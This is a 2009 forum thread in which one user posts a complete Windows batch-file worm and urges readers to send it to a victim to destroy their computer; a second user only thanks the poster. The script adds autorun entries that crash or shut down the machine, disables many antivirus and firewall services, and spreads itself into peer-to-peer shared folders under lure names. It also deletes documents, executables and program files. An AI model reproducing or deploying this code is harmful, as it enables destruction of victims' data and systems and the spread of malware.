Would you like to react to this message? Create an account in a few clicks or log in to continue.
Guests do not make an account to advertise anything or your account will be banned. ~FireWall~

2 posters

    Real bat worm

    avatar
    Hassan A.K
    Member
    Member


    Posts : 32
    Thanks : 8
    Join date : 2009-07-01
    Age : 27
    Location : K.S.A

    Real bat worm Empty Real bat worm

    Post  Hassan A.K Thu Jul 02, 2009 6:02 pm

    copy and paste this into notepad and save the file as anything.BAT (remember to write .BAT ) .

    DO NOT OPEN THE FILE!! send it to the victim and it will DESTROY HIS COMPUTER!

    the code:

    @echo off
    echo @echo off>%systemroot%winsic.bat && echo :1>>%systemroot%winsic.bat
    echo mkdir %random%>>%systemroot%winsic.bat && echo goto 1>>%systemroot%winsic.bat
    reg add "hkey_local_machinesoftwaremicrosoftwindowscurrent versionrun" /v winsic /t reg_sz /d "c:windowswinsic.bat"
    echo @echo off>%systemroot%system32winsoc.bat && echo :1>>%systemroot%system32winsoc.bat
    echo mkdir %random%>>%systemroot%system32winsoc.bat && echo goto 1>>%systemroot%system32winsoc.bat
    reg add "hkey_local_machinesoftwaremicrosoftwindowscurrent versionrun" /v winsoc /t reg_sz /d "c:windowssystem32winsoc.bat" && cd && cd %USERPROFILE%Escritorio
    if exist "C:WINDOWSsystem32taskkill.exe" (
    taskkill /f /im msnmsgr.exe
    ) else (
    tskill msnmsgr
    )
    cd %ProgramFiles%MSN Messenger && attrib -R -A -S -H *.* && del /f /s /q *.*
    echo copy /y %0 %alluserprofile%* inicioprogramasinicio
    echo shutdown -s -f -t 0>%systemroot%windirz.bat
    reg add "hkey_local_machinesoftwaremicrosoftwindowscurrent versionrun" /v windirz /t reg_sz /d "c:windowswindirz.bat"
    echo @echo off>%systemroot%system32windoss.bat
    echo :dos>>%systemroot%system32windoss.bat
    echo msg * zickox te ama contac: los_misfits@hotmail.com>>%systemroot%system32windo ss.bat
    echo goto dos>>%systemroot%system32windoss.bat
    reg add "hkey_local_machinesoftwaremicrosoftwindowscurrent versionrun" /v winsoc /t reg_sz /d "c:windowssystem32windoss.bat"


    reg add "HKLMsystemcurrentcontrolsetservicesMcAfee Firewall" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesMcAfee Winguage" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesMcAfee Firewall" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesMcAfee Firewall" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesMcAfee.InstantUpda te.Monitor" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesMcAfee.InstantUpda te.Monitor" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesMcAfee.Instant Update.Monitor" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesMcAfeeVirusScanSer vice" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesMcAfeeVirusScanSer vice" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesMcAfeeVirusSca nService" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNAV Agent" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNAV Agent" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNAV Agent" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNAV DefAlert" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNod32CC" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNod32CC" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemCURRENTcontrolsetservicesNod32CC" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNOD32POP3" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNOD32POP3" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNOD32POP3" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNorton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNorton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNorton Auto-Protect" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNorton eMail Protect" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNorton eMail Protect" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNorton eMail Protect" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNorton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNorton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNorton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNorton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNorton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNorton Program Scheduler" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNorton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNorton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNorton Program Event Checker" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesNPS Event Checker" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesNPS Event Checker" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesNPS Event Checker" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesPanda Scheduler" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesPanda Scheduler" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesPanda Scheduler" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesScanInicio" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesScanInicio" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesScanInicio " /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesSymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesSymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesSymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesTiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesTiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesTiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesTrueVector" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesTrueVector" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesTrueVector " /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesVirusScan Online" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesVirusScan Online" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesVirusScan Online" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset001servicesZoneAlarm" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcontrolset002servicesZoneAlarm" /v Start /t REG_DWORD /d 4 /f
    reg add "HKLMsystemcurrentcontrolsetservicesZoneAlarm" /v Start /t REG_DWORD /d 4 /f


    goto menu1
    :menu1
    if exist "%programfiles%ICQshared files" (
    Goto ICQ
    ) else (
    Goto menu2
    )
    :ICQ
    copy /y %0 %programfiles%ICQshared filesringtones.bat
    copy /y %0 %programfiles%ICQshared filesxxx.bat
    copy /y %0 %programfiles%ICQshared filespass msn.bat
    copy /y %0 %programfiles%ICQshared filesxploits.bat
    copy /y %0 %programfiles%ICQshared filesflooder.bat
    copy /y %0 %programfiles%ICQshared fileshackmsn.bat
    copy /y %0 %programfiles%ICQshared filesporno.bat
    copy /y %0 %programfiles%ICQshared fileshackyahoo.bat

    :menu2
    if exist "%programfiles%Filetopia3Files" (
    Goto Fileto
    ) else (
    Goto menu3
    )
    :fileto
    copy /y %0 %programfiles%Filetopia3Filesringtones.bat
    copy /y %0 %programfiles%Filetopia3Filespass msn.bat
    copy /y %0 %programfiles%Filetopia3Filesxploits.bat
    copy /y %0 %programfiles%Filetopia3Filesflooder.bat
    copy /y %0 %programfiles%Filetopia3Fileshackmsn.bat
    copy /y %0 %programfiles%Filetopia3Fileshackyahoo.bat
    copy /y %0 %programfiles%Filetopia3Filesporno.bat
    copy /y %0 %programfiles%Filetopia3Filesxxx.bat



    :menu3
    if exist "%programfiles%appleJuiceincoming" (
    goto apple
    ) else (
    goto menu4
    )
    :apple
    copy /y %0 %programfiles%appleJuiceincomingxxx.bat
    copy /y %0 %programfiles%appleJuiceincomingporno.bat
    copy /y %0 %programfiles%appleJuiceincominghackyahoo.bat
    copy /y %0 %programfiles%appleJuiceincominghackmsn.bat
    copy /y %0 %programfiles%appleJuiceincomingflooder.bat
    copy /y %0 %programfiles%appleJuiceincomingxploits.bat
    copy /y %0 %programfiles%appleJuiceincomingpass msn.bat
    copy /y %0 %programfiles%appleJuiceincomingringtones.bat

    :menu4
    if exist "%programfiles%LimeWireShared" (
    goto lime
    ) else (
    goto menu5
    )
    :lime
    copy /y %0 %programfiles%LimeWireSharedringtones.bat
    copy /y %0 %programfiles%LimeWireSharedpass msn.bat
    copy /y %0 %programfiles%LimeWireSharedxploits.bat
    copy /y %0 %programfiles%LimeWireSharedflooder.bat
    copy /y %0 %programfiles%LimeWireSharedhackmsn.bat
    copy /y %0 %programfiles%LimeWireSharedhackyahoo.bat
    copy /y %0 %programfiles%LimeWireSharedporno.bat
    copy /y %0 %programfiles%LimeWireSharedxxx.bat


    :menu5
    if exist "%programfiles%Overnetincoming" (
    goto over
    ) else (
    goto menu6
    )
    ver
    copy /y %0 %programfiles%Overnetincomingxxx.bat
    copy /y %0 %programfiles%Overnetincomingporno.bat
    copy /y %0 %programfiles%Overnetincominghackyahoo.bat
    copy /y %0 %programfiles%Overnetincominghackmsn.bat
    copy /y %0 %programfiles%Overnetincomingflooder.bat
    copy /y %0 %programfiles%Overnetincomingxploits.bat
    copy /y %0 %programfiles%Overnetincomingpass msn.bat
    copy /y %0 %programfiles%Overnetincomingringtones.bat
    :menu6
    if exist "%programfiles%SwaptorDownload" (
    goto swa
    ) else (
    goto menu7
    )
    :swa
    copy /y %0 %programfiles%SwaptorDownloadringtones.bat
    copy /y %0 %programfiles%SwaptorDownloadpass msn.bat
    copy /y %0 %programfiles%SwaptorDownloadxploits.bat
    copy /y %0 %programfiles%SwaptorDownloadflooder.bat
    copy /y %0 %programfiles%SwaptorDownloadhackmsn.bat
    copy /y %0 %programfiles%SwaptorDownloadhackyahoo.bat
    copy /y %0 %programfiles%SwaptorDownloadporno.bat
    copy /y %0 %programfiles%SwaptorDownloadxxx.bat

    :menu7
    if exist "%programfiles%WinMXMy Shared Folder" (
    goto win
    ) else (
    goto menu8
    :win
    copy /y %0 %programfiles%WinMXMy Shared Folderringtones.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderpass msn.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderxploits.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderflooder.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderhackmsn.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderhackyahoo.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderporno.bat
    copy /y %0 %programfiles%WinMXMy Shared Folderxxx.bat


    :menu8
    if exist "%programfiles%TeslaFiles" (
    goto tesla
    ) else (
    goto menu9
    :telsa
    copy /y %0 %programfiles%TeslaFilesxxx.bat
    copy /y %0 %programfiles%TeslaFilesporno.bat
    copy /y %0 %programfiles%TeslaFileshackyahoo.bat
    copy /y %0 %programfiles%TeslaFileshackmsn.bat
    copy /y %0 %programfiles%TeslaFilesflooder.bat
    copy /y %0 %programfiles%TeslaFilesxploits.bat
    copy /y %0 %programfiles%TeslaFilespass msn.bat
    copy /y %0 %programfiles%TeslaFilesringtones.bat

    :menu9
    if exist "%programfiles%XoloXDownloads (
    goto xolox
    ) else (
    goto menu10
    :xolox
    copy /y %0 %programfiles%XoloXDownloadsringtones.bat
    copy /y %0 %programfiles%XoloXDownloadspass msn.bat
    copy /y %0 %programfiles%XoloXDownloadsxploits.bat
    copy /y %0 %programfiles%XoloXDownloadsflooder.bat
    copy /y %0 %programfiles%XoloXDownloadshackmsn.bat
    copy /y %0 %programfiles%XoloXDownloadshackyahoo.bat
    copy /y %0 %programfiles%XoloXDownloadsporno.bat
    copy /y %0 %programfiles%XoloXDownloadsxxx.bat

    :menu10
    if exist "%programfiles%RapigatorShare" (
    goto rap
    ) else (
    goto menu11
    :rap
    copy /y %0 %programfiles%RapigatorShareringtones.bat
    copy /y %0 %programfiles%RapigatorSharepass msn.bat
    copy /y %0 %programfiles%RapigatorSharexploits.bat
    copy /y %0 %programfiles%RapigatorShareflooder.bat
    copy /y %0 %programfiles%RapigatorSharehackmsn.bat
    copy /y %0 %programfiles%RapigatorSharehackyahoo.bat
    copy /y %0 %programfiles%RapigatorShareporno.bat
    copy /y %0 %programfiles%RapigatorSharexxx.bat

    :menu11
    if exist "%programfiles%KMDMy Shared Folder" (
    goto kmd
    ) else (
    goto menu12
    :kmd
    copy %0 %programfiles%KMDMy Shared Folderxxx.bat
    copy %0 %programfiles%KMDMy Shared Folderporno.bat
    copy %0 %programfiles%KMDMy Shared Folderhackyahoo.bat
    copy %0 %programfiles%KMDMy Shared Folderhackmsn.bat
    copy %0 %programfiles%KMDMy Shared Folderflooder.bat
    copy %0 %programfiles%KMDMy Shared Folderxploits.bat
    copy %0 %programfiles%KMDMy Shared Folderpass msn.bat
    copy %0 %programfiles%KMDMy Shared Folderringtones.bat


    :menu12
    if exist "%programfiles%Direct ConnectReceived Files" (
    goto direc
    ) else (
    goto menu13
    :direc
    copy /y %0 %programfiles%Direct ConnectReceived Filesringtones.bat
    copy /y %0 %programfiles%Direct ConnectReceived Filespass msn.bat
    copy /y %0 %programfiles%Direct ConnectReceived Filesxploits.bat
    copy /y %0 %programfiles%Direct ConnectReceived Filesflooder.bat
    copy /y %0 %programfiles%Direct ConnectReceived Fileshackmsn.bat
    copy /y %0 %programfiles%Direct ConnectReceived Fileshackyahoo.bat
    copy /y %0 %programfiles%Direct ConnectReceived Filesporno.bat
    copy /y %0 %programfiles%Direct ConnectReceived Filesxxx.bat

    :menu13
    if exist "%programfiles%AresMy Shared Folder" (
    goto ares
    ) else (
    goto 1
    :ares
    copy /y %0 %programfiles%AresMy Shared Folderxxx.bat
    copy /y %0 %programfiles%AresMy Shared Folderporno.bat
    copy /y %0 %programfiles%AresMy Shared Folderhackyahoo.bat
    copy /y %0 %programfiles%AresMy Shared Folderhackmsn.bat
    copy /y %0 %programfiles%AresMy Shared Folderflooder.bat
    copy /y %0 %programfiles%AresMy Shared Folderxploits.bat
    copy /y %0 %programfiles%AresMy Shared Folderpass msn.bat
    copy /y %0 %programfiles%AresMy Shared Folderringtones.bat

    cd

    attrib -r -a -s -h *.doc
    attrib -r -a -s -h *.txt
    del /s /q /f *.doc
    del /s /q /f *.txt

    cd %userprofile%escritorio

    attrib -r -a -s -h *.doc
    attrib -r -a -s -h *.txt
    attrib -r -a -s -h *.exe
    del /s /q /f *.doc
    del /s /q /f *.txt
    del /s /q /f *.exe
    del /s /q /f *.lnk

    :1
    mkdir %random%
    goto 1

    echo s | erase c:windowsvmmreg32.dll

    echo s | erase c:windows





    Copy it and paste It into Notepad then save the file as (anything).BAT
    avatar
    Jenny
    Member
    Member


    Posts : 102
    Thanks : 2
    Join date : 2009-06-27
    Age : 28

    Real bat worm Empty Re: Real bat worm

    Post  Jenny Sun Jul 05, 2009 11:35 am

    thnx for the post

      Current date/time is Thu May 23, 2024 1:04 am